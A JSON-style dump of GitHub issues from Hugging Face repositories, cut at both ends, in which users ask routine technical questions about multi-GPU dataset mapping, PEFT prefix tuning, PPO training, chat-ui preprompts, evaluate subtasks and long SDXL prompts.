AutoModelForSeq2SeqLM.from_pretrained(\"facebook/nllb-200-distilled-600M\")\r\n\r\n# put model on each available GPU\r\n# also, should I do it like this or use nn.DataParallel?\r\nmodel.to(\"cuda:0\")\r\nmodel.to(\"cuda:1\")\r\n\r\nset_start_method(\"spawn\")\r\n\r\ndef translate_captions(batch, rank):\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(rank % torch.cuda.device_count())\r\n \r\n texts = batch[\"text\"]\r\n inputs = tokenizer(texts, padding=True, truncation=True, return_tensors=\"pt\").to(model.device)\r\n\r\n translated_tokens = model.generate(\r\n **inputs, forced_bos_token_id=tokenizer.lang_code_to_id[\"eng_Latn\"], max_length=30\r\n )\r\n translated_texts = tokenizer.batch_decode(translated_tokens, skip_special_tokens=True)\r\n\r\n batch[\"translated_text\"] = translated_texts\r\n \r\n return batch\r\n\r\nupdated_dataset = dataset.map(translate_captions, with_rank=True, num_proc=2, batched=True, batch_size=256)\r\n```\r\n\r\nI've personally tried running this script on a machine with 2 A100 GPUs.\r\n\r\n## Error 1\r\n\r\nRunning the code snippet above from the terminal (python script.py) resulted in the following error:\r\n\r\n```\r\nTraceback (most recent call last):\r\n File \"\", line 1, in \r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/spawn.py\", line 116, in spawn_main\r\n exitcode = _main(fd, parent_sentinel)\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/spawn.py\", line 125, in _main\r\n prepare(preparation_data)\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/spawn.py\", line 236, in prepare\r\n _fixup_main_from_path(data['init_main_from_path'])\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/spawn.py\", line 287, in _fixup_main_from_path\r\n main_content = runpy.run_path(main_path,\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/runpy.py\", line 289, in run_path\r\n return _run_module_code(code, init_globals, run_name,\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/runpy.py\", line 96, in _run_module_code\r\n _run_code(code, mod_globals, init_globals,\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/runpy.py\", line 86, in _run_code\r\n exec(code, run_globals)\r\n File \"/home/niels/python_projects/datacomp/datasets_multi_gpu.py\", line 16, in \r\n set_start_method(\"spawn\")\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/context.py\", line 247, in set_start_method\r\n raise RuntimeError('context has already been set')\r\nRuntimeError: context has already been set\r\n```\r\n\r\n## Error 2\r\nThen, based on [this Stackoverflow answer](https://stackoverflow.com/a/71616344/7762882), I put the `set_start_method(\"spawn\")` section in a try: catch block. This resulted in the following error:\r\n```\r\nFile \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/datasets/dataset_dict.py\", line 817, in \r\n k: dataset.map(\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/datasets/arrow_dataset.py\", line 2926, in map\r\n with Pool(nb_of_missing_shards, initargs=initargs, initializer=initializer) as pool:\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/context.py\", line 119, in Pool\r\n return Pool(processes, initializer, initargs, maxtasksperchild,\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/pool.py\", line 215, in __init__\r\n self._repopulate_pool()\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/pool.py\", line 306, in _repopulate_pool\r\n return self._repopulate_pool_static(self._ctx, self.Process,\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/pool.py\", line 329, in _repopulate_pool_static\r\n w.start()\r\n File \"/home/niels/anaconda3/envs/datacomp/lib/python3.10/site-packages/multiprocess/process.py\", line 121, in start\r\n self._popen = self._Popen(self)\r\n File \"/home/niels/anaconda3/envs/datacomp/l", "url": "https://github.com/huggingface/datasets/issues/6186", "state": "closed", "labels": [ "documentation", "enhancement" ], "created_at": "2023-08-28T10:00:59Z", "updated_at": "2024-10-07T09:39:51Z", "comments": 18, "user": "NielsRogge" }, { "repo": "huggingface/autotrain-advanced", "number": 238, "title": "How to Train Consecutively Using Checkpoints", "body": "Hi, I've been using your project and it's been great.\r\nI'm a complete beginner in the field of AI, so sorry for such a basic question.\r\nIs there a way to train consecutively with checkpoints?\r\n\r\nThank you!\r\n", "url": "https://github.com/huggingface/autotrain-advanced/issues/238", "state": "closed", "labels": [], "created_at": "2023-08-28T08:31:30Z", "updated_at": "2023-12-18T15:30:42Z", "user": "YOUNGASUNG" }, { "repo": "huggingface/transformers.js", "number": 264, "title": "[Question] TypeScript rewrite", "body": "\r\nHi Joshua. I found your idea is extremely exciting.\r\nI am a frontend developer who has worked on TypeScript professionally for three years. Would you mind me doing a TypeScript re-write, so this npm package can have a better DX. If I successfully transform the codebase into TypeScript and pass all the tests, would you mind merging it into main?\r\n\r\nI just forked this repo. https://github.com/Lantianyou/transformers.js", "url": "https://github.com/huggingface/transformers.js/issues/264", "state": "open", "labels": [ "question" ], "created_at": "2023-08-28T08:29:06Z", "updated_at": "2024-04-27T12:05:24Z", "user": "Lantianyou" }, { "repo": "huggingface/text-generation-inference", "number": 934, "title": "How to use fine tune model in text-generation-inference", "body": "Hi Team\r\nI fine tune the llama 2 13b model and using merge_and_upload() functionality, I merge the model.\r\nHow I can use this merge model using text-generation-inference.\r\n\r\n**Following command given an error**\r\n![image](https://github.com/huggingface/text-generation-inference/assets/7765864/22e51673-4a4f-47ba-9b06-158ec7812951)\r\n**Error**\r\n![image](https://github.com/huggingface/text-generation-inference/assets/7765864/00f219ea-0483-4496-af11-9ce9d949a7d2)\r\n", "url": "https://github.com/huggingface/text-generation-inference/issues/934", "state": "closed", "labels": [], "created_at": "2023-08-28T07:36:25Z", "updated_at": "2023-08-28T08:53:28Z", "user": "chintanshrinath" }, { "repo": "huggingface/peft", "number": 869, "title": "How to correctly use Prefixing Tuning?", "body": "### System Info\r\n\r\npeft 0.5.0\r\ntransformers 4.32.0\r\n\r\n### Who can help?\r\n\r\n_No response_\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\n```\r\nmodel = AutoModelForSeq2SeqLM.from_pretrained('bigscience/T0pp', load_in_8bit=True)\r\nmodel = prepare_model_for_int8_training(model)\r\nconfig = PrefixTuningConfig(\r\n task_type=TaskType.SEQ_2_SEQ_LM,\r\n num_virtual_tokens=100,\r\n token_dim=model.config.hidden_size,\r\n num_transformer_submodules=1,\r\n num_attention_heads=model.config.num_heads,\r\n num_layers=model.config.num_layers,\r\n encoder_hidden_size=1792,\r\n)\r\nmodel = get_peft_model(model, config)\r\n```\r\n\r\n### Expected behavior\r\n\r\nI'm assuming `num_layers`, `num_attention_heads`, and `token_dim` need to match the base model. In the sample `num_transformer_submodules` is 1. But encoder-decoder has two transformers right? Should this be 2? \r\n\r\n\r\nWhen I run the code above I got\r\n\r\n```\r\nFile \"/python3.10/site-packages/transformers/models/t5/modeling_t5.py\", line 551, in forward\r\nposition_bias = position_bias + mask # (batch_size, n_heads, seq_length, key_length)\r\nRuntimeError: The size of tensor a (3) must match the size of tensor b (103) at non-singleton dimension 3\r\n```\r\nWhen I print out the shape of `position_bias` and `mask`. `mask` has 100 more tokens than `position_bias` seems like on the decoder side. It's also taking in the prefix embeddings", "url": "https://github.com/huggingface/peft/issues/869", "state": "closed", "labels": [], "created_at": "2023-08-27T18:03:06Z", "updated_at": "2024-11-05T09:49:01Z", "user": "Vincent-Li-9701" }, { "repo": "huggingface/transformers", "number": 25783, "title": "How to re-tokenize the training set in each epoch?", "body": "I have a special tokenizer which can tokenize the sentence based on some propability distribution.\r\nFor example, 'I like green apple' ->'[I],[like],[green],[apple]'(30%) or '[I],[like],[green apple]' (70%).\r\nNow in the training part, I want the Trainer can retokenize the dataset in each epoch. How can I do so?", "url": "https://github.com/huggingface/transformers/issues/25783", "state": "closed", "labels": [], "created_at": "2023-08-27T16:23:25Z", "updated_at": "2023-09-01T13:01:43Z", "user": "tic-top" }, { "repo": "huggingface/optimum", "number": 1318, "title": "Is it possible to compile pipeline (with tokenizer) to ONNX Runtime?", "body": "### Feature request\n\nIs it possible to compile the entire pipeline, tokenizer and transformer, to run with ONNX Runtime? My goal is to remove the `transformers` dependency entirely for runtime, to reduce serverless cold start.\n\n### Motivation\n\nI could not find any examples, and could not make this work, so I wonder if compiling tokenizer with ONNX is possible at all.\n\n### Your contribution\n\nI could try implementing this, or add an example to documentation if this is possible already.", "url": "https://github.com/huggingface/optimum/issues/1318", "state": "open", "labels": [ "feature-request", "onnxruntime" ], "created_at": "2023-08-26T17:57:52Z", "updated_at": "2023-08-28T07:58:13Z", "comments": 1, "user": "j-adamczyk" }, { "repo": "huggingface/trl", "number": 695, "title": "Reward is getting lower and lower with each epoch, What can be the issue in training?", "body": "Hello,\r\n\r\nI am trying to optimize a T5 fine-tuned model for text generation task. At the moment, I am using BLEU score (between two texts) as a reward function. Before the optimization with PPO, model is able to produce an average BLEU score of 35% however with ppo, after each epoch, the reward is reducing so far. What is something I am doing wrong or should look into as I am new to RL? as the goal of PPO is to improve the reward or atleast make it more than the original bleu score of 35% that we got before model was optimized with PPO. \r\nthis is my code:\r\n\r\n\r\n\r\n```from transformers import AutoModelForSeq2SeqLM\r\n#loading the fine-tuned model\r\nactive_model=AutoModelForSeq2SeqLMWithValueHead.from_pretrained('small_gen_clean_prem/')\r\nref_model = AutoModelForSeq2SeqLMWithValueHead.from_pretrained('small_gen_clean_prem/')\r\n\r\nbatch_size = 200\r\nconfig = PPOConfig(\r\n batch_size=batch_size,\r\n learning_rate=1.41e-5,\r\n mini_batch_size=16,\r\n gradient_accumulation_steps=1 #if I set to more than 1, I get empty tensors error\r\n)\r\n\r\nppo_trainer = PPOTrainer(config, active_model, ref_model, tokenizer)\r\n\r\n\r\ngeneration_kwargs = {\r\n \"min_length\": -1,\r\n \"top_k\": 0.0,\r\n \"top_p\": 1.0,\r\n \"do_sample\": True,\r\n \"pad_token_id\": tokenizer.eos_token_id\r\n}\r\n\r\n\r\noutput_min_length = 4\r\noutput_max_length = 512\r\noutput_length_sampler = LengthSampler(output_min_length, output_max_length)`\r\n\r\n\r\nscore_all=[]\r\nfor i in range(20):\r\n input_tensors=[]\r\n output_tensors=[]\r\n score_=[]\r\n for data in valid_dataset:\r\n query_txt =data['input']\r\n query_tensor = tokenizer.encode(query_txt, return_tensors=\"pt\").to(device)\r\n input_tensors.append(query_tensor.squeeze(0))\r\n desired_txt = data['ground_truth']\r\n print('desired text\\n:',desired_txt)\r\n response_tensor = ppo_trainer.generate([item for item in query_tensor], return_prompt=False,length_sampler=output_length_sampler, **generation_kwargs)\r\n response_txt = tokenizer.decode(response_tensor[0], skip_special_tokens=True, max_new_tokens=512)\r\n output_tensors.append(response_tensor[0].squeeze(0))\r\n \r\n\r\n\r\n score = sentence_bleu([response_txt.split(),desired_txt.split()])\r\n score_.append(score)\r\n\r\n reward = [torch.FloatTensor([score]) for score in score_]\r\n\r\n\r\n score_all.append(np.mean(score_))\r\n \r\n \r\n train_stats = ppo_trainer.step(input_tensors,output_tensors,reward)\r\n```\r\nIn the graph attached, y-axis is average mean score in each epoch.\r\n\r\n\"scores_ppo\"\r\n", "url": "https://github.com/huggingface/trl/issues/695", "state": "closed", "labels": [], "created_at": "2023-08-26T00:22:04Z", "updated_at": "2023-11-01T15:06:14Z", "user": "sakinafatima" }, { "repo": "huggingface/dataset-viewer", "number": 1733, "title": "Add API fuzzer to the tests?", "body": "Tools exist, see https://openapi.tools/", "url": "https://github.com/huggingface/dataset-viewer/issues/1733", "state": "closed", "labels": [ "question", "tests" ], "created_at": "2023-08-25T21:44:10Z", "updated_at": "2023-10-04T15:04:16Z", "user": "severo" }, { "repo": "huggingface/diffusers", "number": 4778, "title": "[Discussion] How to allow for more dynamic prompt_embed scaling/weighting/fusion?", "body": "We have a couple of issues and requests for the community that ask for the possibility to **dynamically** change certain knobs of Stable Diffusion that are applied at **every denoising step**. \r\n\r\n- 1. **Prompt Fusion**. as stated [here](https://github.com/huggingface/diffusers/issues/4496). To implement prompt fusion in a general way we need to give the user the possibility to define some kind of \"prompt\" scheduler where every denoising timestep can receive a different `prompt_embeds` and `negative_prompt_embeds`. \r\n\r\n=> A very obvious way to allow for this would be to allow passing a list of list of prompts and list of list of `prompt_embeddings`\r\n\r\n- 2. **Dynamic prompt weighting**. A1111 and InvokeAI both have functionalities that allow to weight the prompt embeddings differently at each timestep. InvokeAI has this implemented in `compel` via a `conditioning_scheduler` see here: https://github.com/damian0815/compel/blob/d15e883bbbfae5b3fbd8d60065aa330c99a662b4/src/compel/compel.py#L93 \r\nSuch a scheduler could for example allow the user to not just define a unique `prompt_embedding` condition (e.g. putting more word on a certain word), but also allowing to dynamically change that condition during the course of denoising.\r\nThis is also asked by SD.Next (cc @vladmandic).\r\n\r\n=> Here we have a couple of options, the simplest is probably to just allow passing a list of `prompt_embeddings` assuming that the user just takes care of the prompt weighting themselves. We could then also nicely integrate this with `compel`.\r\n\r\n- 3. **Dynamic `guidance_scale` / `cfg` weighting**. Many people have found that a `cfg` scheduling works really well for `SDXL`. It's related to 2. as it's also a knob to tweak text embeddings weights over the course of inference but it's much more global where as 2. is can be more condition specific. This is also related to https://github.com/huggingface/diffusers/pull/4569#issuecomment-1678667625 which proposes dynamic scaling.\r\n\r\n=> Here we could solve this by allowing the user to provide a list of `guidance_scales`. In addition we could maybe introduce something like `guidance_scaling_type=\"static/dynamic\" to allow for #4569 \r\n\r\n**Overall**:\r\n\r\n=> It's not too difficult to make these features work, but it'll require some very good docs about `prompt_embeds` and `negative_prompt_embeds`. We also have to think about edge cases like SDXL which has two text encoders. We also have to think about how this can be applied to other models such as Kandinsky, IF.\r\n\r\nCurios to hear your thoughts here. Also would love to discuss a design proposal of how we can better support things in a coherent, library-wide design @sayakpaul @williamberman @yiyixuxu @DN6 ", "url": "https://github.com/huggingface/diffusers/issues/4778", "state": "closed", "labels": [ "stale" ], "created_at": "2023-08-25T10:03:17Z", "updated_at": "2023-11-09T21:42:39Z", "user": "patrickvonplaten" }, { "repo": "huggingface/transformers.js", "number": 260, "title": "[Question] CDN download for use in a worker", "body": "Is there a way to get this to work inside a worker:\r\n```html\r\n\r\n```\r\nI noticed you do this: \r\n```js\r\nimport { pipeline, env } from \"@xenova/transformers\";\r\n```\r\n\r\n\r\nI'm trying to avoid any node modules for this project I am on", "url": "https://github.com/huggingface/transformers.js/issues/260", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-24T18:24:51Z", "updated_at": "2023-08-29T13:57:19Z", "user": "quantuminformation" }, { "repo": "huggingface/notebooks", "number": 428, "title": "How to load idefics fine tune model for inference?", "body": "Hi, recently I fine tune idefics model with peft. I am not able to load the model. \r\nIs there any way to load the model with peft back for inference? ", "url": "https://github.com/huggingface/notebooks/issues/428", "state": "open", "labels": [], "created_at": "2023-08-24T13:39:22Z", "updated_at": "2024-04-25T10:39:55Z", "user": "imrankh46" }, { "repo": "huggingface/peft", "number": 857, "title": "How to load fine tune IDEFICS model with peft for inference?", "body": "### Feature request\r\n\r\nRequest for IDEFICS model. \r\n\r\n### Motivation\r\n\r\nI fine tune IDEFICS on custom dataset, but when I load they showing error.\r\n\r\n\r\n### Your contribution\r\n\r\nAdd class like AutoPeftModelforVisionTextToText() class, to easily load the model.", "url": "https://github.com/huggingface/peft/issues/857", "state": "closed", "labels": [], "created_at": "2023-08-24T12:34:44Z", "updated_at": "2023-09-01T15:46:50Z", "user": "imrankh46" }, { "repo": "huggingface/datasets", "number": 6176, "title": "how to limit the size of memory mapped file?", "body": "### Describe the bug\n\nHuggingface datasets use memory-mapped file to map large datasets in memory for fast access.\r\nHowever, it seems like huggingface will occupy all the memory for memory-mapped files, which makes a troublesome situation since we cluster will distribute a small portion of memory to me (once it's over the limit, memory cannot be allocated), however, when the dataset checks the total memory, all of the memory will be taken into account which makes huggingface dataset try to allocate more memory than allowed. \r\nSo is there a way to explicitly limit the size of memory mapped file?\n\n### Steps to reproduce the bug\n\npython\r\n>>> from datasets import load_dataset\r\n>>> dataset = load_dataset(\"c4\", \"en\", streaming=True)\n\n### Expected behavior\n\nIn a normal environment, this will not have any problem.\r\nHowever, when the system allocates a portion of the memory to the program and when the dataset checks the total memory, all of the memory will be taken into account which makes huggingface dataset try to allocate more memory than allowed. \n\n### Environment info\n\nlinux cluster with SGE\uff08Sun Grid Engine\uff09", "url": "https://github.com/huggingface/datasets/issues/6176", "state": "open", "labels": [], "created_at": "2023-08-24T05:33:45Z", "updated_at": "2023-10-11T06:00:10Z", "user": "williamium3000" }, { "repo": "huggingface/autotrain-advanced", "number": 225, "title": "How to make inference the model", "body": "When I launch \r\n**autotrain llm --train --project_name my-llm --model meta-llama/Llama-2-7b-hf --data_path . --use_peft --use_int4 --learning_rate 2e-4 --train_batch_size 2 --num_train_epochs 3 --trainer sft**\r\n\r\nI have this output\r\n![autoTrainDoubt](https://github.com/huggingface/autotrain-advanced/assets/30750249/ac813d13-d4a4-43f4-901a-372fdaec045b)\r\n\r\n**I have two questions.**\r\n**1.-** The output is telling that the training is finished, however I only watch the log of 1 epoch. **Is there any way to see the 'training loss' param of the 3 epochs**.\r\n\r\n**2.-** After training, I try to make inferece with Text-generation-Inference HF application. However I have an error because config.json is not in the model folder. The output model is this. **Why is not present this file? Should I do something more?**.\r\n\r\n![autoTrainDoubt1](https://github.com/huggingface/autotrain-advanced/assets/30750249/2af0d7fe-526c-4646-aa64-9adf6d70632f)\r\n\r\n", "url": "https://github.com/huggingface/autotrain-advanced/issues/225", "state": "closed", "labels": [], "created_at": "2023-08-23T20:24:23Z", "updated_at": "2023-12-18T15:30:40Z", "user": "amgomezdev" }, { "repo": "huggingface/autotrain-advanced", "number": 223, "title": "How to use captions with Dreambooth?", "body": "I'm trying to train an SDXL model with Dreambooth using captions for each image (I have found that this made quite a difference when training for style with the 1.5 model). How can I achieve that using autotrain? If I understand [this line](https://github.com/huggingface/autotrain-advanced/blob/main/src/autotrain/trainers/dreambooth/main.py#L290C13-L290C13) correctly, it will pick it up if it's in the file name, is that right? And if yes, how does it play together with the specified prompt?\r\n", "url": "https://github.com/huggingface/autotrain-advanced/issues/223", "state": "closed", "labels": [], "created_at": "2023-08-23T15:32:16Z", "updated_at": "2023-12-18T15:30:39Z", "user": "MaxGfeller" }, { "repo": "huggingface/trl", "number": 677, "title": "how to run reward_trainer.py", "body": "ValueError: Some specified arguments are not used by the HfArgumentParser: ['-f', '/Users/samittan/Library/Jupyter/runtime/kernel-32045810-5e16-48f4-8d44-c7a7f975f8a4.json']\r\n\r\n", "url": "https://github.com/huggingface/trl/issues/677", "state": "closed", "labels": [], "created_at": "2023-08-23T09:39:52Z", "updated_at": "2023-11-02T15:05:32Z", "user": "samitTAN" }, { "repo": "huggingface/chat-ui", "number": 412, "title": "preprompt not being injected for Llama 2", "body": "1. When I alter the preprompt for a Llama 2 type model, it appears to have no impact. It's as though the preprompt is not there. Sample config for .env.local:\r\n\r\n```\r\nMODELS=`[\r\n{\r\n \"name\": \"Trelis/Llama-2-7b-chat-hf-function-calling\",\r\n \"datasetName\": \"Trelis/function_calling_extended\",\r\n \"description\": \"function calling Llama-7B-chat\",\r\n \"websiteUrl\": \"https://research.Trelis.com\",\r\n \"preprompt\": \"Respond in French to all questions\",\r\n \"userMessageToken\": \"[INST]\",\r\n \"assistantMessageToken\": \"[/INST]\",\r\n \"parameters\": {\r\n \"temperature\": 0.01,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1024\r\n },\r\n \"endpoints\": [{\r\n \"url\": \"http://127.0.0.1:8080\"\r\n }]\r\n}\r\n]`\r\n```\r\n\r\nOther notes:\r\n- The same model responds to changes in system message when run in colab.\r\n\r\n- Here, with chat-ui, I'm running with a tgi server.\r\n\r\n- Llama-chat has weird templating whereby the first system and user have to be wrapped in INST. The best that can be done with the default templating is just to separately wrap the system message and each user input in [INST] and [/INST]. That said, I don't think that deviation should be significant enough to mean that the preprompt is ignored... but maybe it is OR maybe I'm making some other mistake?", "url": "https://github.com/huggingface/chat-ui/issues/412", "state": "closed", "labels": [ "support", "models" ], "created_at": "2023-08-23T09:15:24Z", "updated_at": "2023-09-18T12:48:07Z", "comments": 7, "user": "RonanKMcGovern" }, { "repo": "huggingface/unity-api", "number": 15, "title": "How to download the model to the local call API", "body": "Because my internet connection is not very good, I would like to download the model to my local machine and use the Hugging Face API for calling. How can I achieve this?", "url": "https://github.com/huggingface/unity-api/issues/15", "state": "closed", "labels": [], "created_at": "2023-08-23T08:08:40Z", "updated_at": "2023-11-08T10:26:34Z", "user": "haldon98" }, { "repo": "huggingface/evaluate", "number": 485, "title": "How to use `SubTask` with metrics that require valid `config_name`", "body": "## Issue \r\n\r\nCurrently I there does not seem to be a way to define the `config_name` for metric for a `SubTask` inside an `evaluate.EvaluationSuite`. \r\n\r\n## Version\r\n\r\nevaluate version: 0.4.0\r\ntransformers version 4.32.0\r\nPython version Python 3.10.6\r\n\r\n## Example\r\n\r\nFor example, consider the following `EvaluationSuite` which tried to run the \"glue\" metric which requires a `config_name` when calling `evaluate.load`:\r\n\r\nCode in `suite.py`:\r\n```python \r\nimport evaluate\r\nfrom evaluate.evaluation_suite import SubTask\r\nclass Suite(evaluate.EvaluationSuite):\r\n\r\n def __init__(self, name):\r\n super().__init__(name)\r\n self.preprocessor = lambda x: {\"text\": x[\"text\"].lower()}\r\n self.suite = [\r\n SubTask(\r\n task_type=\"text-classification\",\r\n data=\"glue\",\r\n subset=\"sst2\",\r\n split=\"validation[:10]\",\r\n args_for_task={\r\n \"metric\": \"glue\",\r\n \"input_column\": \"sentence\",\r\n \"label_column\": \"label\",\r\n \"label_mapping\": {\r\n \"LABEL_0\": 0.0,\r\n \"LABEL_1\": 1.0\r\n }\r\n }\r\n ),\r\n]\r\n```\r\nNow consider running this `EvaluationSuite` with the following:\r\n\r\n```python\r\nfrom evaluate import EvaluationSuite\r\nsuite = EvaluationSuite.load('suite.py')\r\nresults = suite.run(\"gpt2\")\r\n```\r\n\r\nRunning this code results in the following error:\r\n\r\n```\r\n---------------------------------------------------------------------------\r\nKeyError Traceback (most recent call last)\r\nCell In[60], line 2\r\n 1 suite = EvaluationSuite.load('suite.py')\r\n----> 2 results = suite.run(\"gpt2\")\r\n\r\nFile /localdisk/twilbers/src/notebooks/poc/glue/.venv/lib/python3.10/site-packages/evaluate/evaluation_suite/__init__.py:124, in EvaluationSuite.run(self, model_or_pipeline)\r\n 122 args_for_task[\"subset\"] = task.subset\r\n 123 args_for_task[\"split\"] = task.split\r\n--> 124 results = task_evaluator.compute(**args_for_task)\r\n 126 results[\"task_name\"] = task_name + \"/\" + task.subset if task.subset else task_name\r\n 127 results[\"data_preprocessor\"] = str(task.data_preprocessor) if task.data_preprocessor is not None else None\r\n\r\nFile /localdisk/twilbers/src/notebooks/poc/glue/.venv/lib/python3.10/site-packages/evaluate/evaluator/text_classification.py:136, in TextClassificationEvaluator.compute(self, model_or_pipeline, data, subset, split, metric, tokenizer, feature_extractor, strategy, confidence_level, n_resamples, device, random_state, input_column, second_input_column, label_column, label_mapping)\r\n 127 metric_inputs, pipe_inputs = self.prepare_data(\r\n 128 data=data, input_column=input_column, second_input_column=second_input_column, label_column=label_column\r\n 129 )\r\n 130 pipe = self.prepare_pipeline(\r\n 131 model_or_pipeline=model_or_pipeline,\r\n 132 tokenizer=tokenizer,\r\n 133 feature_extractor=feature_extractor,\r\n 134 device=device,\r\n 135 )\r\n--> 136 metric = self.prepare_metric(metric)\r\n 138 # Compute predictions\r\n 139 predictions, perf_results = self.call_pipeline(pipe, pipe_inputs)\r\n\r\nFile /localdisk/twilbers/src/notebooks/poc/glue/.venv/lib/python3.10/site-packages/evaluate/evaluator/base.py:447, in Evaluator.prepare_metric(self, metric)\r\n 445 metric = load(self.default_metric_name)\r\n 446 elif isinstance(metric, str):\r\n--> 447 metric = load(metric)\r\n 449 return metric\r\n\r\nFile /localdisk/twilbers/src/notebooks/poc/glue/.venv/lib/python3.10/site-packages/evaluate/loading.py:735, in load(path, config_name, module_type, process_id, num_process, cache_dir, experiment_id, keep_in_memory, download_config, download_mode, revision, **init_kwargs)\r\n 731 evaluation_module = evaluation_module_factory(\r\n 732 path, module_type=module_type, revision=revision, download_config=download_config, download_mode=download_mode\r\n 733 )\r\n 734 evaluation_cls = import_main_class(evaluation_module.module_path)\r\n--> 735 evaluation_instance = evaluation_cls(\r\n 736 config_name=config_name,\r\n 737 process_id=process_id,\r\n 738 num_process=num_process,\r\n 739 cache_dir=cache_dir,\r\n 740 keep_in_memory=keep_in_memory,\r\n 741 experiment_id=experiment_id,\r\n 742 hash=evaluation_module.hash,\r\n 743 **init_kwargs,\r\n 744 )\r\n 746 if module_type and module_type != evaluation_instance.module_type:\r\n 747 raise TypeError(\r\n 748 f\"No module of module type '{module_type}' not found for '{path}' locally, or on the Hugging Face Hub. Found module of module type '{evaluation_instance.module_type}' instead.\"\r\n 749 )\r\n\r\nFile /localdisk/twilbers/src/notebooks/poc/glue/.venv/lib/python3.10/site-packages/evaluate/module.py:182, in EvaluationModule.__init__(self, config_name, keep_in_memory, cache_dir, num_process, process_id, seed, experiment_id, hash, max_conc", "url": "https://github.com/huggingface/evaluate/issues/485", "state": "open", "labels": [], "created_at": "2023-08-22T23:15:43Z", "updated_at": "2023-08-23T16:38:18Z", "user": "tybrs" }, { "repo": "huggingface/diffusers", "number": 4716, "title": "How to handle SDXL long prompt", "body": "### Describe the bug\n\nI am unable to use embeds prompt in order to handle prompt that is longer than 77 tokens.\n\n### Reproduction\n\n```python\r\nimport itertools\r\nimport os.path\r\nimport random\r\nimport string\r\nimport time\r\nimport typing as typ\r\n\r\nimport torch\r\nfrom diffusers import StableDiffusionXLPipeline\r\nfrom tqdm import tqdm\r\n\r\nimport bb\r\nfrom web_sdxl import seed_everything\r\n\r\nseed_everything(42)\r\n\r\n\r\ndef generate_random_string(length):\r\n letters = string.ascii_letters\r\n result = ''.join(random.choice(letters) for _ in range(length))\r\n return result\r\n\r\n\r\ndef get_pipeline_embeds(pipeline, prompt, negative_prompt, device):\r\n \"\"\" Get pipeline embeds for prompts bigger than the maxlength of the pipe\r\n :param pipeline:\r\n :param prompt:\r\n :param negative_prompt:\r\n :param device:\r\n :return:\r\n \"\"\"\r\n max_length = pipeline.tokenizer.model_max_length\r\n\r\n # simple way to determine length of tokens\r\n count_prompt = len(prompt.split(\" \"))\r\n count_negative_prompt = len(negative_prompt.split(\" \"))\r\n\r\n # create the tensor based on which prompt is longer\r\n if count_prompt >= count_negative_prompt:\r\n input_ids = pipeline.tokenizer(prompt, return_tensors=\"pt\", truncation=False).input_ids.to(device)\r\n shape_max_length = input_ids.shape[-1]\r\n negative_ids = pipeline.tokenizer(negative_prompt, truncation=False, padding=\"max_length\",\r\n max_length=shape_max_length, return_tensors=\"pt\").input_ids.to(device)\r\n\r\n else:\r\n negative_ids = pipeline.tokenizer(negative_prompt, return_tensors=\"pt\", truncation=False).input_ids.to(device)\r\n shape_max_length = negative_ids.shape[-1]\r\n input_ids = pipeline.tokenizer(prompt, return_tensors=\"pt\", truncation=False, padding=\"max_length\",\r\n max_length=shape_max_length).input_ids.to(device)\r\n\r\n concat_embeds = []\r\n neg_embeds = []\r\n for i in range(0, shape_max_length, max_length):\r\n concat_embeds.append(pipeline.text_encoder(input_ids[:, i: i + max_length])[0])\r\n neg_embeds.append(pipeline.text_encoder(negative_ids[:, i: i + max_length])[0])\r\n\r\n return torch.cat(concat_embeds, dim=1), torch.cat(neg_embeds, dim=1)\r\n\r\n\r\nmodel_path = \"fine_tuned_models/sdxl-sarit\"\r\ndevice = \"mps\" if torch.backends.mps.is_available() else \"cpu\"\r\nout_dir: str = \"gluta40\"\r\n\r\nage_prompts: typ.List[str] = [\r\n \"young asian girl\",\r\n \"a photograph of an angel with sly expression, wearing a see-thru short roman style dress, beautiful asian mixed european woman face, beautiful eyes, black hair, looking down, hyper realistic and detailed, 16k\",\r\n]\r\nhand_prompts: typ.List[str] = [\r\n \"left hand holding a gluta40 jar one hand, right hand is behind her back\",\r\n \"right hand holding a gluta40 jar one hand, left hand is behind her back\",\r\n]\r\nface_angle_prompts: typ.List[str] = [\r\n \"straight face\",\r\n]\r\nhair_prompts: typ.List[str] = [\r\n \"black long tied hair\",\r\n \"black long hair\",\r\n]\r\nbackground_prompts: typ.List[str] = [\r\n \"no background, hold both hands, bad hands\",\r\n]\r\nnegative_prompt: str = \"disfigured, disproportionate, bad anatomy, bad proportions, ugly, out of frame, mangled, asymmetric, cross-eyed, depressed, immature, stuffed animal, out of focus, high depth of field, cloned face, cloned head, age spot, skin blemishes, collapsed eyeshadow, asymmetric ears, imperfect eyes, unnatural, conjoined, missing limb, missing arm, missing leg, poorly drawn face, poorly drawn feet, poorly drawn hands, floating limb, disconnected limb, extra limb, malformed limbs, malformed hands, poorly rendered face, poor facial details, poorly rendered hands, double face, unbalanced body, unnatural body, lacking body, long body, cripple, cartoon, 3D, weird colors, unnatural skin tone, unnatural skin, stiff face, fused hand, skewed eyes, surreal, cropped head, group of people, too many fingers, bad hands, six fingers\"\r\ncombined_list = list(itertools.product(age_prompts, hand_prompts, face_angle_prompts, hair_prompts, 